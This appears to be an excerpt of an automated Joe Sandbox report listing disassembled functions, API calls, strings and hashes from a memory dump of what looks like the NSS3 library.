Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
String ID: <+~l
API String ID: 2538134263-1511606287
Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction ID: 3295df67cc7fe341f7c125816f52db32ab24d1ddb8c144157fecf33055552eaf
Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction Fuzzy Hash: 9C11E7B7B001046BDB009E65DD04A9B77DA9B84278F198134E91CD7790E772ED15C7A1

Function 6C83CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C83CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C83CC7B), ref: 6C83CD7A
Part of subcall function 6C83CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C83CD8E
Part of subcall function 6C83CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C83CDA5
Part of subcall function 6C83CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C83CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C83CCB5
memcpy.VCRUNTIME140(6C8D14F4,6C8D02AC,00000090), ref: 6C83CCD3
memcpy.VCRUNTIME140(6C8D1588,6C8D02AC,00000090), ref: 6C83CD2B

Part of subcall function 6C759AC0: socket.WSOCK32(?,00000017,6C7599BE), ref: 6C759AE6
Part of subcall function 6C759AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C7599BE), ref: 6C759AFC

Part of subcall function 6C760590: closesocket.WSOCK32(6C759A8F,?,?,6C759A8F,00000000), ref: 6C760597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6C83CCB0

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: a74915ff465cb073602e36d3e24d40bb6ae3f6bac3e489a22664f6880c22f140
Instruction ID: 3373a76c898eaaa32c8a691d185cecb738b2f8ce79660ac433d3b4821c445212
Opcode Fuzzy Hash: a74915ff465cb073602e36d3e24d40bb6ae3f6bac3e489a22664f6880c22f140
Instruction Fuzzy Hash: DC11B7F5B112505EDB309F999A067423AB99B4633CF502939E4068BF42E738E408CBD5

Function 6C75AB80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C75AB8A
PR_SetError.NSS3(FFFFE897,00000000), ref: 6C75AC07

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_LogPrint.NSS3(connect -> %d,00000000), ref: 6C75AC1A

Strings

connect -> %d, xrefs: 6C75AC15

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$ErrorPrint
String ID: connect -> %d
API String ID: 1784924131-3487059786
Opcode ID: fd13d0fbf21493089223fb367597d89457b77b074eddf3fabb9d0086417e075c
Instruction ID: acaa83eb1757ca6ae3edcc0415cd26b866b2299b519268d9ff6f8e1b45522bef
Opcode Fuzzy Hash: fd13d0fbf21493089223fb367597d89457b77b074eddf3fabb9d0086417e075c
Instruction Fuzzy Hash: B101FE71E001445FF7106F2CDD0ABB53B62EF52369F848974E95986E52EB319CA0C7E1

Function 6C882BE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C882BFA
PR_ExitMonitor.NSS3 ref: 6C882C2B
PR_LogPrint.NSS3(%s incr => %d (for %s),?,?,?), ref: 6C882C5D

Strings

%s incr => %d (for %s), xrefs: 6C882C58

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Monitor$EnterExitPrint
String ID: %s incr => %d (for %s)
API String ID: 2736670396-2912983388
Opcode ID: 81680282e41425488a6547552bf4c9ed7fae4f252d2f9cc430cb9e40b05b8d6f
Instruction ID: d2e98b149ca332bac92674e190420a09b0958ddc45b689adcc776811b6d72f3c
Opcode Fuzzy Hash: 81680282e41425488a6547552bf4c9ed7fae4f252d2f9cc430cb9e40b05b8d6f
Instruction Fuzzy Hash: 5D01D271A021109FE7318F19DE4865673BAEB4532CB054875E809C3F01DA35EC09C7D0

Function 6C6FA8E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 6C82A480: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C84C3A2,?,?,00000000,00000000), ref: 6C82A528
Part of subcall function 6C82A480: sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C82A6E0

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014576,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6FA94F

Strings

database corruption, xrefs: 6C6FA943
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6FA939
%s at line %d of [%.10s], xrefs: 6C6FA948

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 9424534ae69acde7ba4234b9bb193dc2241796b87c888971c72ed7e0a8c6121d
Instruction ID: 57a65bbd84f677eb633c5fd9d16c99c7ba65a40bab34bc5af7e1299c320d75fb
Opcode Fuzzy Hash: 9424534ae69acde7ba4234b9bb193dc2241796b87c888971c72ed7e0a8c6121d
Instruction Fuzzy Hash: 15014931A00208ABC7208BAADE15B9BB3FAAF44308F454939E95D5BB41D731E90AC7D5

Function 6C788850 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C790715), ref: 6C788859
PR_NewLock.NSS3 ref: 6C788874

Part of subcall function 6C8398D0: calloc.MOZGLUE(00000001,00000084,6C760936,00000001,?,6C76102C), ref: 6C8398E5

PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C78888D

Strings

NSS, xrefs: 6C788887

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPool
String ID: NSS
API String ID: 2230817933-3870390017
Opcode ID: 7dfe73e74d23b58ac6da1fffc7b47475bb1f57b86e1a829d048330e5c753e09e
Instruction ID: fcef4b18cb607b354c8cd310d9009876b584a971768a68630119cded073b108c
Opcode Fuzzy Hash: 7dfe73e74d23b58ac6da1fffc7b47475bb1f57b86e1a829d048330e5c753e09e
Instruction Fuzzy Hash: C2F09666E4262133F220126A6E0EB8675985F5175DF440431EA0DA7F82EA91A51883E3

Function 6C76C9B0 Relevance: 6.1, APIs: 4, Instructions: 128stringCOMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3 ref: 6C76CB3D
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C76CB4B
sqlite3_free.NSS3 ref: 6C76CB70
sqlite3_result_error_nomem.NSS3 ref: 6C76CB99

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintfsqlite3_result_error_nomemstrlen
String ID:
API String ID: 1052848593-0
Opcode ID: f8c2fc7c015d172faec5b37d6b47a8a32416d45c8df2b41b28b35e9bc2c6766b
Instruction ID: 6b7d0f3124bbc2c2f92d86867fbd8c2c94889ed259862f24d7081229bc65f425
Opcode Fuzzy Hash: f8c2fc7c015d172faec5b37d6b47a8a32416d45c8df2b41b28b35e9bc2c6766b
Instruction Fuzzy Hash: 0C51F432608B458ADB11EF36C14012BB7F1BF8A799F108B2DEC956AA50EB31D485C782

Function 6C834FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C7185D2,00000000,?,?), ref: 6C834FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C83500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8350C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8350D6

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: 0d728c6dbbb3f0776263ac2111d1ba00709ef17bca3d9bdde1ccf9011ae32fcb
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction Fuzzy Hash: C84195B6A013158BCB18CF58DCE1796B7E1BF4431871D5A69C84AC7B02E379E891CBC1

Function 6C7ECF00 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C7ED01E

Part of subcall function 6C7BE550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7BE5A0

PK11_FreeSymKey.NSS3(00000000), ref: 6C7ED055

Part of subcall function 6C7BADC0: TlsGetValue.KERNEL32(?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE10
Part of subcall function 6C7BADC0: EnterCriticalSection.KERNEL32(?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE24
Part of subcall function 6C7BADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C79D079,00000000,00000001), ref: 6C7BAE5A
Part of subcall function 6C7BADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE6F
Part of subcall function 6C7BADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE7F
Part of subcall function 6C7BADC0: TlsGetValue.KERNEL32(?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAEB1
Part of subcall function 6C7BADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAEC9

PK11_PubUnwrapSymKey.NSS3(?,00000000,6C7ECC55,00000107,00000000), ref: 6C7ED079
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7ED08C

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_$CriticalEnterErrorSectionValue$DeriveFreeUnlockUnwrapWithfreememset
String ID:
API String ID: 324975836-0
Opcode ID: fb6a2384cb5fe95e85917a6b61b909e881411e6079ed46b2b8910d1ce349c983
Instruction ID: 18562bc3b37cb2fc9ae041b4c7cc8b201adf988d3176c6d9afa258e881798879
Opcode Fuzzy Hash: fb6a2384cb5fe95e85917a6b61b909e881411e6079ed46b2b8910d1ce349c983
Instruction Fuzzy Hash: 1B4170B19042199BE7208F18DD40BA9F7F5FF88308F0546AAE90CA7741E3319986CB95

Function 6C88A860 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 6C88A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6C88A662), ref: 6C88A69E
Part of subcall function 6C88A690: PR_NewCondVar.NSS3(?), ref: 6C88A6B4

PR_IntervalNow.NSS3 ref: 6C88A8C6
EnterCriticalSection.KERNEL32(?), ref: 6C88A8EB
_PR_MD_UNLOCK.NSS3(?), ref: 6C88A944
PR_SetPollableEvent.NSS3(?), ref: 6C88A94F

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
String ID:
API String ID: 811965633-0
Opcode ID: 16596b093b1c8517f9a37600ecbf454fa891da79078760ec752b560439866690
Instruction ID: 75321ab09326697269460174a52c27b0be27808b0f9b8a58a34fe6488c21a87d
Opcode Fuzzy Hash: 16596b093b1c8517f9a37600ecbf454fa891da79078760ec752b560439866690
Instruction Fuzzy Hash: 5A4169B0A06A128FC724CF29C680996FBF1FF48318714892AD859CBF91E731F850CB90

Function 6C7E2C80 Relevance: 6.1, APIs: 4, Instructions: 105COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,6C7E1289,?), ref: 6C7E2D72

Part of subcall function 6C7E3390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6C7E2CA7,E80C76FF,?,6C7E1289,?), ref: 6C7E33E9
Part of subcall function 6C7E3390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6C7E342E

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C7E1289,?), ref: 6C7E2D61

Part of subcall function 6C7E0B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7E0B21
Part of subcall function 6C7E0B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7E0B64

PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6C7E1289,?), ref: 6C7E2D88
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C7E1289,?), ref: 6C7E2DAF

Part of subcall function 6C79B8F0: PR_CallOnceWithArg.NSS3(6C8D2178,6C79BCF0,?), ref: 6C79B915
Part of subcall function 6C79B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6C79B933
Part of subcall function 6C79B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6C79B9C8
Part of subcall function 6C79B8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C79B9E1

Part of subcall function 6C7E0A50: SECOID_GetAlgorithmTag_Util.NSS3(6C7E2A90,E8571076,?,6C7E2A7C,6C7E21F1,?,?,?,00000000,00000000,?,?,6C7E21DD,00000000), ref: 6C7E0A66

Part of subcall function 6C7E3310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6C7E2D1E,?,?,?,?,00000000,?,?,?,?,?,6C7E1289), ref: 6C7E3348

Part of subcall function 6C7E06F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6C7E2E70,00000000), ref: 6C7E0701

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
String ID:
API String ID: 2288138528-0
Opcode ID: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction ID: 5a015356914bf6ae675f53163a118a5c92b5578229b2475e386a58f78a6be281
Opcode Fuzzy Hash: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction Fuzzy Hash: E731AEB79002066BDB009E64DE49F9A3765BF4D31DF140134ED155BB91FB31E518C7A2

Function 6C7E6AE0 Relevance: 6.1, APIs: 4, Instructions: 105threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C7E6B3E

Part of subcall function 6C7E6C20: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C7E6C8A
Part of subcall function 6C7E6C20: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C7E6C90

Part of subcall function 6C7E7E20: PR_SetError.NSS3(00000000,00000000), ref: 6C7E7E5F

PR_SetError.NSS3(FFFFD07B,00000000), ref: 6C7E6B84
PR_EnterMonitor.NSS3(?), ref: 6C7E6BE0
PR_ExitMonitor.NSS3(?), ref: 6C7E6C01

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ErrorMonitorfree$CurrentEnterExitThread
String ID:
API String ID: 4197271849-0
Opcode ID: 6f33e52518e310fe7ffc1f3ca6e1df0ce5b6733c8dafd8bbc7adbe682e17ef73
Instruction ID: 6ca127daaac6f2aca7228b041d801f5909407ec0d7a5108c8e2caea020c07086
Opcode Fuzzy Hash: 6f33e52518e310fe7ffc1f3ca6e1df0ce5b6733c8dafd8bbc7adbe682e17ef73
Instruction Fuzzy Hash: 953159B390011957D7106A689E89B9F36688F0872CF180534EE09DFB93E731DA09C7E1

Function 6C776C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C776C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C776CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C776CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C898FE0), ref: 6C776CFE

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 9e3d487cde7e7a34c129a0986873402d6ecbb6b185af372faad925703a1c51a3
Instruction ID: ebfac83a40163580f0c04dee76e2852311eb2e54f0a060eb12593f4d31e897f1
Opcode Fuzzy Hash: 9e3d487cde7e7a34c129a0986873402d6ecbb6b185af372faad925703a1c51a3
Instruction Fuzzy Hash: A2319EB1A0021A9FDF18DF65CA85ABFBBF5EB45248F10443DD905D7700EB31A905CBA0

Function 6C884F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C884F5D
free.MOZGLUE(?), ref: 6C884F74
free.MOZGLUE(?), ref: 6C884F82
GetLastError.KERNEL32 ref: 6C884F90

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: 6cb5f746638725229bc10de842fe5059d857883534ba92364e53b02c853593a0
Instruction ID: 2c54b8d3ecb3c1d67a9501ba21e894622d158427d69ffe1bfe78a111f5a4d42c
Opcode Fuzzy Hash: 6cb5f746638725229bc10de842fe5059d857883534ba92364e53b02c853593a0
Instruction Fuzzy Hash: 263168B6A012194BEB20CB69DD91BDFB3BCFFC5348F050628EC15A7B81DB34A905C691

